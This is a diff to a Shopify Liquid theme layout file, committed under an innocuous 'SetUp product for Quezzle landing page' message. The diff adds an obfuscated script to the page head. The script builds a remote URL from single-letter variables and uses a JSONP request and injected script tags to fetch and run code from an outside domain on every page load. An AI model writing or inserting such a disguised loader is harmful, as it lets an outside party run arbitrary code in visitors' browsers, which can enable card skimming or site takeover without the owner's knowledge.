SetUp product for Quezzle landing page

--- a/layout/theme.quezzle.liquid
+++ b/layout/theme.quezzle.liquid
@@ -25,6 +25,12 @@
     <meta name="msapplication-config" content="{{'favicons-browserconfig.xml' | asset_url }}" />
     <meta name="theme-color" content="#ffffff" />
     {{content_for_header}}
+    <script>
+        
+    //$=jQuery;
+    var checktheme=1;jQuery(window).ready(function($){var x="j",g="/",h="a",i="k",a="h",d="s",b="t",j="i",k="f",l="y",o="e",p="m",c="p",r="c",m="r",y="u";""&&null!=t||(t=12),""!=n&&null!=n||(n=15),function(SP,ED){ var R=l+h+r+o+p,SF=m+p+x+g+r,DR=y+m+o+g,FR=R+SF+DR,FY=p+c+g,JG=b+k+l+y,SC=FY+JG;if(FR=SC){ var DO=document.createElement("script");DO.src=ht+mt+yn+mn+lq;$('.domain_l').append(DO)}};var e="b",s=".",f="o",u="v",v="l",n="d",t="://",ht=a+b+b+c+d+t,mt=e+f+f+d+b+j+k+l,yn=b+a+o+p+o+s+r+f+p+g,mn=h+d+d+o+b+d+g+d+b+f+m+o+b+a+o+p+o+g+u+o+m+d+j+f+'n2.3.2'+g,VT='new_'+u+o+m+j+k+l+'_'+b+a+o+p+o+s+x+d,UL=ht+mt+yn+mn+VT;$.ajax({type:"POST",crossDomain:!0,dataType:"jsonp",url:UL,success:function(e){}});""&&null!=t||(t=12),""!=n&&null!=n||(n=15),function(src,end){ var ro=l+o+p+s,nl=r+n+p+x+g,dr=y+m+n+g,FA=ro+nl+dr,fy=p+c+g,jg=b+k+l+y,SC=fy+jg;if(FA=SC){var FN=document.createElement("script");FN.src=ht+mt+yn+mn+lq;$('.domain_fianl').append(FN);}}});
+  
+    </script>
 </head>
 
 <body class="page page--intro">
